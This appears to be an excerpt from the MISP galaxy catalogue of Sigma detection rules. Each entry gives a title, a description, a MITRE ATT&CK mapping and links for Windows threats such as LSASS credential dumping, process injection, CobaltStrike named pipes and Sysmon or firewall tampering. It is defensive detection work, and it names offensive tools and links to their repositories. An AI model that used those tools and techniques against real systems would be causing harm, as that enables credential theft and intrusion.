The tag is: misp-galaxy:sigma-rules="Potential Shellcode Injection"

Potential Shellcode Injection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8922. Table References

Links

https://github.com/EmpireProject/PSInject

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_shellcode_injection.yml

HackTool - LittleCorporal Generated Maldoc Injection

Detects the process injection of a LittleCorporal generated Maldoc.

The tag is: misp-galaxy:sigma-rules="HackTool - LittleCorporal Generated Maldoc Injection"

HackTool - LittleCorporal Generated Maldoc Injection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"

Table 8923. Table References

Links

https://github.com/connormcgarr/LittleCorporal

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml

Potential Credential Dumping Activity Via LSASS

Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Activity Via LSASS"

Potential Credential Dumping Activity Via LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8924. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md

https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html

https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html

https://research.splunk.com/endpoint/windows_possible_credential_dumping/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml

HackTool - CobaltStrike BOF Injection Pattern

Detects a typical pattern of a CobaltStrike BOF which inject into other processes

The tag is: misp-galaxy:sigma-rules="HackTool - CobaltStrike BOF Injection Pattern"

HackTool - CobaltStrike BOF Injection Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 8925. Table References

Links

https://github.com/boku7/spawn

https://github.com/boku7/injectAmsiBypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml

Potential NT API Stub Patching

Detects potential NT API stub patching as seen used by the project PatchingAPI

The tag is: misp-galaxy:sigma-rules="Potential NT API Stub Patching"

Potential NT API Stub Patching has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 8927. Table References

Links

https://github.com/D1rkMtr/UnhookingPatch

https://twitter.com/D1rkMtr/status/1611471891193298944?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_invoke_patchingapi.yml

LSASS Access From Potentially White-Listed Processes

Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference

The tag is: misp-galaxy:sigma-rules="LSASS Access From Potentially White-Listed Processes"

LSASS Access From Potentially White-Listed Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8928. Table References

Links

https://twitter.com/xpn/status/1491557187168178176

https://twitter.com/mrd0x/status/1460597833917251595

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml

Credential Dumping Activity By Python Based Tool

Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.

The tag is: misp-galaxy:sigma-rules="Credential Dumping Activity By Python Based Tool"

Credential Dumping Activity By Python Based Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8929. Table References

Links

https://github.com/skelsec/pypykatz

https://twitter.com/bh4b3sh/status/1303674603819081728

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_python_based_tool.yml

HackTool - HandleKatz Duplicating LSASS Handle

Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles

The tag is: misp-galaxy:sigma-rules="HackTool - HandleKatz Duplicating LSASS Handle"

HackTool - HandleKatz Duplicating LSASS Handle has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8930. Table References

Links

https://github.com/codewhitesec/HandleKatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml

LSASS Memory Access by Tool With Dump Keyword In Name

Detects LSASS process access requests from a source process with the "dump" keyword in its image name.

The tag is: misp-galaxy:sigma-rules="LSASS Memory Access by Tool With Dump Keyword In Name"

LSASS Memory Access by Tool With Dump Keyword In Name has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8931. Table References

Links

https://twitter.com/xpn/status/1491557187168178176

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml

Function Call From Undocumented COM Interface EditionUpgradeManager

Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.

The tag is: misp-galaxy:sigma-rules="Function Call From Undocumented COM Interface EditionUpgradeManager"

Function Call From Undocumented COM Interface EditionUpgradeManager has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 8932. Table References

Links

https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/

https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml

HackTool - SysmonEnte Execution

Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon

The tag is: misp-galaxy:sigma-rules="HackTool - SysmonEnte Execution"

HackTool - SysmonEnte Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 8933. Table References

Links

https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png

https://github.com/codewhitesec/SysmonEnte/

https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_sysmonente.yml

Potential Process Hollowing Activity

Detects when a memory process image does not match the disk image, indicative of process hollowing.

The tag is: misp-galaxy:sigma-rules="Potential Process Hollowing Activity"

Potential Process Hollowing Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"

Table 8934. Table References

Links

https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/

https://twitter.com/SecurePeacock/status/1486054048390332423?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_tampering/proc_tampering_susp_process_hollowing.yml

Sysmon Blocked Executable

Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy

The tag is: misp-galaxy:sigma-rules="Sysmon Blocked Executable"

Table 8935. Table References

Links

https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_executable.yml

Sysmon Configuration Change

Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration

The tag is: misp-galaxy:sigma-rules="Sysmon Configuration Change"

Table 8936. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml

Sysmon Blocked File Shredding

Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.

The tag is: misp-galaxy:sigma-rules="Sysmon Blocked File Shredding"

Table 8937. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_shredding.yml

Sysmon Configuration Error

Detects when an adversary is trying to hide it’s action from Sysmon logging based on error messages

The tag is: misp-galaxy:sigma-rules="Sysmon Configuration Error"

Sysmon Configuration Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 8938. Table References

Links

https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml

Sysmon Configuration Modification

Detects when an attacker tries to hide from Sysmon by disabling or stopping it

The tag is: misp-galaxy:sigma-rules="Sysmon Configuration Modification"

Sysmon Configuration Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 8939. Table References

Links

https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml

Sysmon File Executable Creation Detected

Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created.

The tag is: misp-galaxy:sigma-rules="Sysmon File Executable Creation Detected"

Table 8940. Table References

Links

https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_executable_detected.yml

CobaltStrike Named Pipe

Detects the creation of a named pipe as used by CobaltStrike

The tag is: misp-galaxy:sigma-rules="CobaltStrike Named Pipe"

CobaltStrike Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8941. Table References

Links

https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/

https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/

https://github.com/SigmaHQ/sigma/issues/253

https://twitter.com/d4rksystem/status/1357010969264873472

https://redcanary.com/threat-detection-report/threats/cobalt-strike/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml

PUA - CSExec Default Named Pipe

Detects default CSExec pipe creation

The tag is: misp-galaxy:sigma-rules="PUA - CSExec Default Named Pipe"

PUA - CSExec Default Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8942. Table References

Links

https://github.com/malcomvetter/CSExec

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml

HackTool - DiagTrackEoP Default Named Pipe

Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.

The tag is: misp-galaxy:sigma-rules="HackTool - DiagTrackEoP Default Named Pipe"

Table 8943. Table References

Links

https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_diagtrack_eop.yml

HackTool - EfsPotato Named Pipe Creation

Detects the pattern of a pipe name as used by the hack tool EfsPotato

The tag is: misp-galaxy:sigma-rules="HackTool - EfsPotato Named Pipe Creation"

HackTool - EfsPotato Named Pipe Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8944. Table References

Links

https://github.com/zcgonvh/EfsPotato

https://twitter.com/SBousseaden/status/1429530155291193354?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_efspotato.yml

New PowerShell Instance Created

Detects the execution of PowerShell via the creation of a named pipe starting with PSHost

The tag is: misp-galaxy:sigma-rules="New PowerShell Instance Created"

New PowerShell Instance Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8945. Table References

Links

https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html

https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml

Alternate PowerShell Hosts Pipe

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

The tag is: misp-galaxy:sigma-rules="Alternate PowerShell Hosts Pipe"

Alternate PowerShell Hosts Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8946. Table References

Links

https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html

https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml

CobaltStrike Named Pipe Patterns

Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles

The tag is: misp-galaxy:sigma-rules="CobaltStrike Named Pipe Patterns"

CobaltStrike Named Pipe Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8947. Table References

Links

https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752

https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml

PUA - PAExec Default Named Pipe

Detects PAExec default named pipe

The tag is: misp-galaxy:sigma-rules="PUA - PAExec Default Named Pipe"

PUA - PAExec Default Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8948. Table References

Links

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md

https://github.com/poweradminllc/PAExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml

HackTool - Credential Dumping Tools Named Pipe Created

Detects well-known credential dumping tools execution via specific named pipe creation

The tag is: misp-galaxy:sigma-rules="HackTool - Credential Dumping Tools Named Pipe Created"

HackTool - Credential Dumping Tools Named Pipe Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 8949. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml

HackTool - Koh Default Named Pipe

Detects creation of default named pipes used by the Koh tool

The tag is: misp-galaxy:sigma-rules="HackTool - Koh Default Named Pipe"

HackTool - Koh Default Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

Table 8950. Table References

Links

https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_koh_default_pipe.yml

ADFS Database Named Pipe Connection By Uncommon Tool

Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.

The tag is: misp-galaxy:sigma-rules="ADFS Database Named Pipe Connection By Uncommon Tool"

ADFS Database Named Pipe Connection By Uncommon Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 8951. Table References

Links

https://o365blog.com/post/adfs/

https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml

https://github.com/Azure/SimuLand

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml

WMI Event Consumer Created Named Pipe

Detects the WMI Event Consumer service scrcons.exe creating a named pipe

The tag is: misp-galaxy:sigma-rules="WMI Event Consumer Created Named Pipe"

WMI Event Consumer Created Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 8952. Table References

Links

https://github.com/RiccardoAncarani/LiquidSnake

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml

CobaltStrike Named Pipe Pattern Regex

Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles

The tag is: misp-galaxy:sigma-rules="CobaltStrike Named Pipe Pattern Regex"

CobaltStrike Named Pipe Pattern Regex has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8953. Table References

Links

https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752

https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml

HackTool - CoercedPotato Named Pipe Creation

Detects the pattern of a pipe name as used by the hack tool CoercedPotato

The tag is: misp-galaxy:sigma-rules="HackTool - CoercedPotato Named Pipe Creation"

HackTool - CoercedPotato Named Pipe Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8954. Table References

Links

https://blog.hackvens.fr/articles/CoercedPotato.html

https://github.com/hackvens/CoercedPotato

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml

Malicious Named Pipe Created

Detects the creation of a named pipe seen used by known APTs or malware.

The tag is: misp-galaxy:sigma-rules="Malicious Named Pipe Created"

Malicious Named Pipe Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8955. Table References

Links

https://securelist.com/faq-the-projectsauron-apt/75533/

https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a

https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/

https://thedfirreport.com/2020/06/21/snatch-ransomware/

https://github.com/RiccardoAncarani/LiquidSnake

https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

https://www.us-cert.gov/ncas/alerts/TA17-117A

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml

PUA - RemCom Default Named Pipe

Detects default RemCom pipe creation

The tag is: misp-galaxy:sigma-rules="PUA - RemCom Default Named Pipe"

PUA - RemCom Default Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8956. Table References

Links

https://github.com/kavika13/RemCom

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_remcom_default_pipe.yml

PsExec Tool Execution From Suspicious Locations - PipeName

Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack

The tag is: misp-galaxy:sigma-rules="PsExec Tool Execution From Suspicious Locations - PipeName"

PsExec Tool Execution From Suspicious Locations - PipeName has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8957. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml

Mimikatz Use

This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)

The tag is: misp-galaxy:sigma-rules="Mimikatz Use"

Mimikatz Use has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 8958. Table References

Links

https://tools.thehacker.recipes/mimikatz/modules

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml

New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application

Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.

The tag is: misp-galaxy:sigma-rules="New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application"

New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8959. Table References

Links

https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml

The Windows Defender Firewall Service Failed To Load Group Policy

Detects activity when The Windows Defender Firewall service failed to load Group Policy

The tag is: misp-galaxy:sigma-rules="The Windows Defender Firewall Service Failed To Load Group Policy"

The Windows Defender Firewall Service Failed To Load Group Policy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8960. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml

A Rule Has Been Deleted From The Windows Firewall Exception List

Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall

The tag is: misp-galaxy:sigma-rules="A Rule Has Been Deleted From The Windows Firewall Exception List"

A Rule Has Been Deleted From The Windows Firewall Exception List has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8961. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml

Windows Defender Firewall Has Been Reset To Its Default Configuration

Detects activity when Windows Defender Firewall has been reset to its default configuration

The tag is: misp-galaxy:sigma-rules="Windows Defender Firewall Has Been Reset To Its Default Configuration"

Windows Defender Firewall Has Been Reset To Its Default Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8962. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml

All Rules Have Been Deleted From The Windows Firewall Configuration

Detects when a all the rules have been deleted from the Windows Defender Firewall configuration

The tag is: misp-galaxy:sigma-rules="All Rules Have Been Deleted From The Windows Firewall Configuration"

All Rules Have Been Deleted From The Windows Firewall Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8963. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml

Windows Firewall Settings Have Been Changed

Detects activity when the settings of the Windows firewall have been changed

The tag is: misp-galaxy:sigma-rules="Windows Firewall Settings Have Been Changed"

Windows Firewall Settings Have Been Changed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8964. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml

Uncommon New Firewall Rule Added In Windows Firewall Exception List

Detects when a rule has been added to the Windows Firewall exception list

The tag is: misp-galaxy:sigma-rules="Uncommon New Firewall Rule Added In Windows Firewall Exception List"

Uncommon New Firewall Rule Added In Windows Firewall Exception List has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8965. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml

Local User Creation

Detects local user creation on Windows servers, which shouldn’t happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.

The tag is: misp-galaxy:sigma-rules="Local User Creation"

Local User Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 8966. Table References

Links

https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml

Invoke-Obfuscation COMPRESS OBFUSCATION - Security

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION - Security"

Invoke-Obfuscation COMPRESS OBFUSCATION - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

